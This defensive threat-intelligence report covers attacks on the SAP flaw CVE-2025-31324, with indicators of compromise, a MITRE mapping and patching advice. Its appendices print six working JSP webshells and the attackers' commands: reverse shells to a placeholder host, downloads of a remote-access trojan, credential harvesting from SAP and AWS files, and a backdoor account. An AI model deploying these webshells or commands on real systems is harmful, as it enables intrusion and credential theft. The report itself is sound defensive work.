Threat Actors Exploiting CVE-2025-31324 After Public Release of Exploit by ShinyHunters
As detailed in the blogpost “New Exploit for Critical SAP Vulnerability CVE-2025-31324 Released in the Wild” [1], on August 15, 2025, a significant development in the SAP cybersecurity landscape occurred when a fully functional exploit was publicly released. This exploit was allegedly published by “Scattered LAPSUS$ Hunters – ShinyHunters” on a Telegram group and shared by the VX Underground group [2]. Almost immediately, it started being used by different actors, marking a new wave of “turnkey” exploitation that was previously controlled by the threat actor(s) who had the knowledge and expertise to exploit CVE-2025-31324 [3].
This article describes the chronology of events following the public disclosure of the working exploit as a python script, highlighting the actions of the actors that are now targeting SAP Applications, enabled by this new exploit.
Understanding The Exploit
This published script is an exploit for the critical Java deserialization vulnerability CVE-2025-31324. It allows an unauthenticated attacker to achieve remote code execution (RCE) on a vulnerable server. The exploit works by sending a specially crafted ZIP file to a specific server endpoint.
The published script has two main modes of operation: execute a single command on the target server or upload a persistent web shell for persistent access.
How the Exploit Works
Payload Construction:
The core of the exploit lies in large, hardcoded base64 strings. When decoded, these strings form parts of a serialized Java object. This object is a “gadget chain,” a sequence of legitimate Java classes that, when deserialized together, can be manipulated to perform malicious actions (like running a command or writing a file).
Payload Delivery:
- The malicious serialized object is written into a file named .properties.
- This .properties file is then compressed into a ZIP archive in memory.
- The script sends this ZIP archive to the target server via an HTTP POST request to the /developmentserver/metadatauploader endpoint.
Exploitation:
- The SAP server receives the ZIP file and attempts to deserialize the content of the .properties file.
- This deserialization process triggers the malicious gadget chain, causing the server to execute the attacker’s instructions.
Exploit Functionality
Command Execution (–command) :
In this mode, the exploit constructs a Java object payload that, when deserialized, executes the provided system command (e.g., whoami, id), providing a direct way to run commands but does not establish persistence.
Shell Upload (–dropshell)
In this mode, the payload is designed to write a file to the server’s file system. The script uses a relative path to place a JSP web shell in a web-accessible directory in the SAP system. Once uploaded, this shell can be accessed through a browser, allowing the attacker to execute new commands at any time by sending HTTP requests to the deployed webshell’s URL (e.g., http://<target>/irj/shell.jsp?cmd=some_command).
Observed Threat Activity
Following the public release of the gadget on August 15, 2025, the Onapsis Global Threat Intelligence Network, a globally distributed network of sensors that collects threat intelligence, observed an increase in successful exploitations of CVE-2025-31324. This analysis covers the period from public release of the exploit until Aug 25, 2025.
The Attack Sources
Over the period of analysis, several IP Addresses were observed targeting SAP applications from TOR exit nodes with the purpose to hide the real source of the attacks. Approximately 60 unique IP Addresses corresponding to TOR exit nodes were identified.
These IP Addresses were classified as TOR exit nodes by the Cyber Threat Intelligence data provided by CrowdSec.
Besides these TOR exit nodes, almost 15 unique additional IP addresses that were not TOR exit nodes were observed being used to exploit CVE-2025-31324, connect to deployed webshells, or connect back to perform file downloads or reverse shells. Half of these IPs were part of networks identified as malicious by CrowdSec Intelligence [4].
Analysis of Attacker Activity
We are going to analyze the activity that took place on the targeted systems, by abusing the newly released exploit for CVE-2025-31324. This analysis will incorporate the following elements:
- Deployed Webshells: Analyzing the different webshells that were deployed. This can provide IoCs to detect potential attacks to vulnerable SAP Applications.
- Executed Commands: Providing an overview of the commands that were executed either through the deployed webshells, or directly through the exploit RCE capability.
- Clusters of Attackers: Analyzing the different set of actions that are potentially executed by an attacker or group of attackers.
To facilitate consumption and action by Security Operations Center (SOC) operators, the identified threat activity has been mapped to both the MITRE ATT&CK® Framework in “Appendix III: MITRE ATT&CK®” and detailed as Indicators of Compromise (IoCs) in “Appendix IV: Indicators of Compromise“. This mapping provides SOC teams with actionable intelligence, enabling them to understand the tactics, techniques, and procedures (TTPs) employed by the threat actors and to proactively hunt for and detect similar malicious activities within their SAP environments using the provided IoCs.
Deployed Webshells
The publicly available exploit features a standard remote webshell that works on Windows-based systems as well as Linux-based systems. This default webshell is presented through the variable called “content” and receives a cmd GET parameter which is executed as the user <SID>adm.
In addition to this base webshell, Onapsis observed attackers using at least 5 other custom webshells, some of which were more sophisticated than the one available by default on the exploit:
- Standard Webshell: This is the default webshell provided by the public exploit. It’s straightforward, takes a cmd GET parameter, and executes it as the <SID>adm user. It works on both Windows and Linux systems.
- First Custom Webshell: This webshell introduces a layer of sophistication by using AES/ECB/PKCS5Padding encryption for the data transmitted. It also dynamically loads classes, making it potentially harder to detect and analyze.
- Second Custom Webshell: This webshell adds a specific password requirement (pass parameter) to execute commands. This suggests an attempt to control access to the webshell and prevent unauthorized use, potentially by other threat actors or security researchers. The password appears to be randomly generated prior to exploitation.
- Third Custom Webshell: Similar to the standard webshell in its basic functionality (executing commands via a cmd parameter), but its code structure differs.
- Fourth Custom Webshell: This webshell employs a custom encryption scheme with a hardcoded key (xc). It also uses a session attribute (session.getAttribute(“payload”)) to store and reuse a defined class, indicating a multi-stage approach to command execution. This design makes it more complex to analyze and interact with than simpler webshells.
- Fifth Custom Webshell: This webshell initially prints “404”, potentially as a deception tactic to appear as a non-existent page. It then executes commands passed through the cmd parameter, but wraps the output in HTML comments (<!– and –>), which could be an attempt to hide its activity from casual inspection or basic logging.
The code of all identified webshells is available in “Appendix I: Deployed Webshells”
Executed Commands
Throughout their exploitation of CVE-2025-31324, threat actors executed a variety of commands for reconnaissance, information gathering, and establishing persistence. These commands enabled them to
- Perform system and filesystem discovery (e.g., whoami, ls, cat /etc/os-release, ls /usr/sap/*/JXX/),
- Gather sensitive information (e.g., grep for passwords, cat ~/.bash_history, curl for command history), and
- Attempt to access cloud credentials (cat ~ec2-user/.aws/credentials).
Crucially, they targeted SAP-specific password stores like SecStore.properties and SecStore.key to obtain critical system credentials.
<sid>adm 28922 1 0 2023 ? 00:00:00 sapstart
pf=/usr/sap/<SID>/SYS/profile/<SID>_JXX_sap-server
<sid>adm 28962 28922 0 2023 ? 00:00:14 \_ /usr/sap/<SID>/JXX/work/jc.sap<SID>_JXX pf=/usr/sap/<SID>/SYS/profile/<SID>_JXX_sap-server
<sid>adm 29046 28962 0 2023 ? 06:58:48 | \_ /usr/sap/<SID>/JXX/exe/icman -appTrc pf=/usr/sap/<SID>/SYS/profile/<SID>_JXX_sap-server -nodeId=1 -f /usr/sap/<SID>/J0
<sid>adm 10244 28962 0 2024 ? 1-12:34:57 | \_ /usr/sap/<SID>/JXX/exe/jstart -appTrc -nodeId=2 pf=/usr/sap/<SID>/SYS/profile/<SID>_JXX_sap-server -DSAPINFO=<SID>_0
<sid>adm 19274 10244 0 Aug15 ? 00:00:02 | \_ grep -r jdbc: /usr/sap/
<sid>adm 673 10244 0 Aug16 ? 00:00:00 | \_ python -c import os,pty,socket;s=socket.socket();s.connect(("x.x.x.x",9001));os.dup2(s.fileno(),0);os
<sid>adm 674 673 0 Aug16 pts/0 00:00:00 | | \_ /bin/bash
<sid>adm 1083 674 0 Aug16 pts/0 00:00:00 | | \_ less
<sid>adm 1175 10244 0 Aug16 ? 00:00:00 | \_ python -c import os,pty,socket;s=socket.socket();s.connect(("x.x.x.x",9001));os.dup2(s.fileno(),0);os
<sid>adm 1176 1175 0 Aug16 pts/2 00:00:00 | | \_ /bin/bash
<sid>adm 8056 10244 0 Aug16 ? 01:16:57 | \_ htop
<sid>adm 15377 10244 0 Aug16 ? 00:00:00 | \_ sh
Process tree with showing processes spawned through exploitation of CVE-2025-31324
Furthermore, attackers established persistence by deploying remote access tools (RATs) like Sakura, indicating a clear intent for long-term access and control over the compromised SAP applications. Sakura was released earlier this year [5] as an advanced remote administration tool that seeks to remain stealthy and undetectable by modern EDRs, providing features such as hidden browsing, hidden virtual network computing, and the ability to execute payloads in memory.
For a more comprehensive list of the executed commands, refer to “Appendix II: Executed Commands”
Attacker Groups and Tactics
By analyzing the exploitation, deployment of files and usage of those files, as well as the similarity of the actions performed by the attackers, it was possible to highlight at least 4 different groups, besides the additional individual IP addresses or smaller groups:
Cluster #1:
This Threat Group/Actor utilized 40 different IP Addresses to interact with SAP Applications. The activity of this group was highly methodical, consistently executing a specific set of commands to download the SAP secure store. This specialized targeting provides a clear indicator of their intent to acquire and decrypt stored credentials, demonstrating a deep understanding of SAP system architecture. The actor’s use of a custom webshell, which required a fixed password to interact with it, further highlights their sophistication and dedication to the attack. This approach shows they were not relying on generic exploits but had crafted their own tooling to maintain secure access and execute their specific objective.
This group consistently executed this set of commands across different target systems:
env
cat /usr/sap/<SID>/SYS/global/security/data/SecStore.properties
cat /usr/sap/<SID>/SYS/global/security/data/SecStore.key
Cluster #2
This Threat Group/Actor utilized 7 different IP Addresses to interact with SAP Applications. This actor displayed the most advanced and dangerous capabilities among the observed groups. Their activity was highly sophisticated, centered on the repeated downloading and execution of the “Sakura” malware. In addition to using webshells for command execution, the actor bypassed this two-phase approach by performing direct Remote Code Execution (RCE) without an initial shell upload. This actor also demonstrated a clear intent for long-term persistence by initiating multiple reverse shell connections to two different command-and-control (C2) servers. This combination of advanced tooling, direct exploitation, and persistent access methods distinguishes this actor as a significant and highly capable threat.
Cluster #3
This Threat Group/Actor utilized 26 different IP Addresses to interact with SAP Applications. Following the upload of multiple webshells, this actor conducted a series of checks to confirm the files were successfully deployed. The absence of immediate malicious activity from these shells indicates a potential for future use, suggesting a strategy of establishing long-term persistence or brokering access to other threat groups.
Cluster #4
This Threat Group/Actor utilized 5 different IP Addresses to interact with SAP Applications. This threat actor performed extensive reconnaissance after gaining access to the system. They specifically targeted and explored SAP paths in search of cloud credentials (AWS credentials), also searching for plaintext credentials across the operating system, inspecting specific SAP profile values, and hunting for keywords within various configuration files. This group also demonstrated advanced understanding of SAP infrastructure and technology.
Implications for SAP Customers
Threat Actors’ Deep Knowledge of SAP
It is fair to assume that these threat actors that are now exploiting CVE-2025-31324 are not the same actors that wrote the original exploit, who did prove to have a deep understanding of SAP technology by finding the vulnerability and writing the exploit in the first place.
As for these most likely different actors, while some of the observed activities suggest a general understanding of Linux environments, certain threat actors nevertheless demonstrated an advanced knowledge of SAP applications themselves. This was evidenced by their specific targeting of critical SAP files like SecStore.properties and SecStore.key to extract credentials and their ability to navigate SAP-specific directory structures across the SAP application servers. This level of understanding and precision indicates that these actors possess insights beyond generic system exploitation, suggesting the possibility of a pre-existing understanding of SAP’s internal architecture and sensitive data locations.
The Trend of Exploited SAP Vulnerabilities
Onapsis has previously highlighted how SAP vulnerabilities, including those designated as “zero-days,” are frequently targeted [6]. The ongoing exploitation of CVE-2025-31324 further underscores this trend. The fact that this vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog [7] on August 20, 2025, signifies its critical nature and confirms active in-the-wild exploitation.
This KEV designation, combined with the observed increase in exploitation attempts by various threat actors following the public release of an exploit, clearly indicates that adversaries are continuously seeking and leveraging weaknesses in SAP applications. This proactive targeting by malicious entities necessitates a robust and ongoing defense strategy for SAP customers to mitigate the significant risks posed by these persistent threats.
Business Impact
Onapsis observed Threat Actors targeting SAP Applications, establishing persistence and leveraging sensitive SAP information to potentially move laterally. Among the observations, indicators compatible with access brokers were detected. In all cases, threat actors achieved a level of compromise that exposed SAP Applications and all of its data.
If your organization runs SAP Applications that may still be vulnerable, please read through the Next Steps section to help protect your SAP environment from these attacks. Furthermore, please reference the indicators of compromise as a way to start checking for any intrusions.
Immediate Next Steps for Defenders
Patching:
Ensure patches are up to date across SAP applications. This is especially important across Internet-facing applications. Integrating SAP applications in your existing vulnerability management programs can ensure more timely addressing of new and existing vulnerabilities. As an immediate next step, ensure the following SAP Security Notes are applied to address the vulnerabilities:
- 3594142 (for CVE-2025-31324)
- 3604119 (for CVE-2025-42999)
- 3578900 (for CVE-2025-30012)
- 3620498 (for CVE-2025-42980)
- 3610892 (for CVE-2025-42966)
- 3621771 (for CVE-2025-42963)
- 3621236 (for CVE-2025-42964)
Forensics / Incident Response:
Review SAP Applications for traces of potential webshells, as described in SAP Note 3593336 (Unfamiliar files found in SAP NetWeaver Java file system) [8] . Onapsis, in collaboration with Mandiant, released open source tools on GitHub [9] to assess a potentially compromised SAP Application.
Review and Restrict Access:
Limit access to SAP applications, particularly from the internet. Implement network segmentation and strict access controls to minimize exposure.
Monitor SAP Applications for Compromise:
Continuously monitor your SAP environment for any indicators of compromise (IoCs), such as unexpected file uploads, unusual process executions (e.g., whoami, ls, wget, curl, tftp), suspicious network connections to attacker-controlled IPs, or attempts to access sensitive SAP configuration files (/usr/sap/*/SYS/global/security/rsecssfs, SecStore.properties, SecStore.key).
For further insights into the implications of these zero-days and CVEs for organizations, consider registering for the panel discussion “The SAP Zero-Day Wake-Up Call: What CISOs and CIOs Need to Know” [10] featuring security executives from Mandiant (part of Google Cloud), EclecticIQ, NightDragon, and Onapsis on September 10 at 10:00 AM EDT.
References
[1] – https://onapsis.com/blog/new-exploit-for-cve-2025-31324/
[2] – https://vx-underground.org/tmp
[3] – https://nvd.nist.gov/vuln/detail/CVE-2025-31324
[4] – https://doc.crowdsec.net/u/cti_api/intro/
[5] – https://gbhackers.com/sakura-rat-released-on-github/
[6] – https://onapsis.com/resources/reports/active-cyberattacks-mission-critical-sap-applications/
[7] – https://www.cisa.gov/known-exploited-vulnerabilities-catalog
[8] – https://me.sap.com/notes/3593336/E
[9] – GitHub – Onapsis/Onapsis-Mandiant-CVE-2025-31324-Vuln-Compromise-Assessment: CVE-2025-31324 & CVE-2025-42999 vulnerability and compromise assessment tool
[10] – https://onapsis.com/event/zero-day/
Appendix I: Deployed Webshells
The following webshells were observed being deployed after exploiting CVE-2025-31324 on the targeted SAP applications:
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String[] cmdArray;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")};
} else {
cmdArray = new String[] {"/bin/sh", "-c", request.getParameter("cmd")};
}
Process process = Runtime.getRuntime().exec(cmdArray);
// Read the output
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
out.println("<pre>");
while ((line = reader.readLine()) != null) {
out.println(line);
}
// Read errors too (JDK6 doesn't have redirectErrorStream in ProcessBuilder)
BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
while ((line = errorReader.readLine()) != null) {
out.println(line);
}
out.println("</pre>");
}
%>
Standard webshell provided by the published exploit
<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
private byte[] Decrypt(byte[] data) throws Exception
{
String k="<REDACTED>";
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");c.init(2,new javax.crypto.spec.SecretKeySpec(k.getBytes(),"AES"));
byte[] decodebs;
Class baseCls ;
try{
baseCls=Class.forName("java.util.Base64");
Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null);
decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data});
}
catch (Throwable e)
{
baseCls = Class.forName("sun.misc.BASE64Decoder");
Object Decoder=baseCls.newInstance();
decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)});
}
return c.doFinal(decodebs);
}
%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buf = new byte[512];
int length=request.getInputStream().read(buf);
while (length>0)
{
byte[] data= Arrays.copyOfRange(buf,0,length);
bos.write(data);
length=request.getInputStream().read(buf);
}
out.clear();
out=pageContext.pushBody();
new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}
%>%
First custom webshell observed in conjunction with CVE-2025-31324
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("pass").equals("<REDACTED>") && request.getParameter("cmd") != null) {
String[] cmdArray;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")};
} else {
cmdArray = new String[] {"/bin/sh", "-c", request.getParameter("cmd")};
}
Process process = Runtime.getRuntime().exec(cmdArray);
// Read the output
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
out.println("<pre>");
while ((line = reader.readLine()) != null) {
out.println(line);
}
// Read errors too (JDK6 doesn't have redirectErrorStream in ProcessBuilder)
BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
while ((line = errorReader.readLine()) != null) {
out.println(line);
}
out.println("</pre>");
}
%>%
Second custom webshell observed in conjunction with CVE-2025-31324
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String[] cmdArray;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")};
} else {
cmdArray = new String[] {"/bin/sh", "-c", request.getParameter("cmd")};
}
Process process = Runtime.getRuntime().exec(cmdArray);
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
out.println("<pre>");
while ((line = reader.readLine()) != null) {
out.println(line);
}
BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
while ((line = errorReader.readLine()) != null) {
out.println(line);
}
out.println("</pre>");
}
%>
Third custom webshell observed in conjunction with CVE-2025-31324
<%! String xc="<REDACTED>"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>%
Fourth custom webshell observed in conjunction with CVE-2025-31324
<%@ page import="java.util.*,java.io.*"%>
<%
out.println("404");
if (request.getParameter("cmd") != null) {
String[] cmdArray;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")};
} else {
cmdArray = new String[] {"/bin/sh", "-c", request.getParameter("cmd")};
}
Process process = Runtime.getRuntime().exec(cmdArray);
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
out.println("<!--");
while ((line = reader.readLine()) != null) {
out.println(line);
}
BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
while ((line = errorReader.readLine()) != null) {
out.println(line);
}
out.println("-->");
}
Fifth custom webshell observed in conjunction with CVE-2025-31324
Appendix II: Executed Commands
Either directly or through the use of webshells, several OS level commands have been executed with diverse purposes on the targeted SAP Applications:
| Purpose | Commands | Description |
| System Discovery | cat /etc/hosts cat /etc/os-release ls env whoami tftp scp wget | Exploration of system, version and available tools (i.e. scp, tftp, sh, wget, ftpget) |
| Filesystem Discovery | cat /usr/sap/*/SYS/profile/* ls /usr/sap/<SID>/JXX/ ls /usr /tmp /root ls /etc | Discovery of generic as well as SAP-Specific resources. |
| Sensitive Information Gathering | grep -riE ‘password|passwd|secret|key|credential’ /etc /opt /home 2>/dev/null cat /home/*/.bash_history curl -G –data-urlencode “cmd=$(history | tail -1 | cut -d’ ‘ -f4-)” https://<sapserver> grep -E ‘wheel|sudo’ /etc/group | Attempt to exfiltrate the last command in history. Exploration of the bash_history. Search for sensitive content across standard directories.Exploration of high-privileged users |
| Sensitive Cloud Information Gathering | cat ~ec2-user/.aws/credentials cat ~ec2-user/.aws/config find / -name ‘credentials’ 2> /dev/null | grep -i aws env | grep -i ‘aws\|access\|secret’ | Attempts to identify sensitive cloud credentials in order to perform lateral movement. |
| Gathering SAP System Credentials | grep -ri ‘jdbc:’ /usr/sap 2> /dev/null grep -ri ‘password’ /usr/sap/*/SYS/profile 2>/dev/null find /usr/sap -name ‘*.ini’ -exec grep -i ‘password’ {} 2>/dev/null ls /usr/sap/<SID>/SYS/global/security/rsecssfs/key ls /usr/sap/<SID>/SYS/global/security/rsecssfs/data grep -ri ‘smtp.*password’ /etc /opt /usr/sap 2>/dev/null | Lists content of /usr/sap/<SID>/SYS/global/securityLists /usr/sap/<SID>/JXX/global/security/rsecssfs key and data.Searches for “”jdbc:”” inside /usr/sap (looking for plaintext credentials or information)Looks for ‘smtp.password’ in /etc /opt /usr/sap |
| Accessing SAP Password Stores | cat /usr/sap/<SID>/SYS/global/security/data/SecStore.properties cat /usr/sap/<SID>/SYS/global/security/data/SecStore.key cat /usr/sap/*/SYS/global/security/data/secstore | Displayed the SecStore.properties and SecStore.key |
| Establishing Persistence | useradd -m -s /bin/bash backdooruser | Attempts to create a ‘backdoor’ user” |
| Tests the Speed of the Internet Link | yum install speedtest curl -s https://packagecloud.io/install/repositories/ookla/speedtest-cli/script.rpm.sh | bash apt install speedtest-cli -y wget -O /dev/null https://speed.hetzner.de/1GB.bin –no-check-certificate | Attempted to install through different mechanisms, speed test clients |
| Reverse Connection | python -c ‘import os,pty,socket;s=socket.socket();s.connect((“x.x.x.x”,9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/bash”)’ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([“/bin/sh”,”-i”])’ /bin/bash -i > /dev/tcp/x.x.x.x/9001 0>&1 | Performs reverse connections with an attacker-controlled service for reverse shell. |
| RAT | wget http://x.x.x.x/Sakura.sh wget http://x.x.x.x/x-8.6-.Sakura chmod 777 x-8.6-.Sakura.1 sh x-8.6-.Sakura.1 ./x-8.6-.Sakura.1 > test tftp -g x.x.x.x | Downloads and installs a well-known Remote Access Tool called Sakura. |
Appendix III: MITRE ATT&CK® :
Below is a table listing the observed attacker activities mapped to the MITRE ATT&CK Framework.
| Tactic | Technique ID | Technique Name | Description |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Threat actors exploited CVE-2025-31324 on public-facing SAP applications. |
| Execution | T1059.004 | Command and Scripting Interpreter: Java | The exploit utilizes Java deserialization to execute commands on the target server. |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | /bin/sh -c was used for command execution on Linux systems. | |
| Persistence | T1505.003 | Server Software Component: Web Shell | Persistent webshells were uploaded to the SAP system, allowing for continued access. Both standard and custom webshells (e.g., encrypted, password-protected) were observed. |
| Discovery | T1083 | File and Directory Discovery | Attackers executed commands like ls and cat to list directories, review /etc/passwd, and examine SAP configurations (/usr/sap/*/SYS/profile/*, /etc /opt /usr/sap/, .ini files in /usr/sap, /usr/sap/SID/SYS/global/security/rsecssfs). |
| T1033 | System Owner/User Discovery | The whoami command was frequently used for reconnaissance. | |
| T1087 | Account Discovery | Attempts were made to discover plaintext credentials, including JDBC details and AWS credentials. | |
| T1082 | System Information Discovery | Attackers displayed environmental variables and system files. | |
| Defense Evasion | T1027 | Obfuscated Files or Information | Base64 encoding was used for shells and commands. |
| Credential Access | T1555 | Credentials from Password Stores | Attackers “cat-ed” SAP JAVA’s SSFS, SecStore.properties, and SecStore.key, containing passwords. |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP POST requests were used for exploit delivery. Webshells were accessed via HTTP GET requests. |
| T1090.003 | Proxy: Multi-hop proxy | TOR exit nodes were used to hide the real source of attacks. | |
| T1219 | Remote Access Tools | Sakura, a well known RAT was used to perform Command and Control over the targeted systems. | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Information was exfiltrated over several channels. |
Appendix IV: Indicators of Compromise
The following indicators of compromise (IoCs) can be used for threat hunting of attackers targeting SAP applications to exploit CVE-2025-31324, as observed over the past days:
| Indicator Type | Indicator | Description |
|---|---|---|
| IP Addresses | 102[.]91[.]105[.]27 103[.]131[.]14[.]77 146[.]70[.]119[.]12 146[.]70[.]119[.]76 149[.]22[.]88[.]136 177[.]93[.]11[.]110 193[.]32[.]249[.]168 203[.]219[.]11[.]62 216[.]45[.]58[.]177 219[.]76[.]134[.]23 65[.]49[.]68[.]59 68[.]178[.]200[.]40 | Non-Tor IP Addresses used to exploit CVE-2025-31324 or to connect to deployed webshells. |
| IP Addresses | 49[.]13[.]239[.]46 192[.]142[.]54[.]207 | Attacker-controlled IP Addresses used for reverse shells and downloading artifacts. |
| Webshells | 235922fcda386fad5030c0ef7e15d150f419ea3b66d3dea99a1420e9d4dc5a05 c76fe2df728c9d91f678a4efd0cff9d66a0511789194af62f0ea6979ddcc25bd f38f0abf9e68cb76bae8c4d21ad5eddd5b46c5fded35b58ac0274f729faf6a7e 29fbb126ea76866de3ee920e39a761d64c8ce7e6a4f9dabae28a3a2f4853b24f 86a8d949a9568b4697624d36f4c0b976613b66ade8021123cc62eda7f9cabe61 374ea6bc8fb40cd858b1b086cb2bb57f46a6d758bc54b37441897f38af36f627 | Dropped webshells. Randomly named jsp files. |
| Dropped Files | 36173e35e9712a20237c6aa115a6af75cd0874ae8f24e034692b7c65288cce2a | Sakura.sh script used to download architecture-specific binaries. |
| Dropped Files | 045ba75c8372cd461a8ad49a378a9c027c0f6a5bf5ae2d8df969398e72825119 | x-8.6-.Sakura (Sakura RAT) |
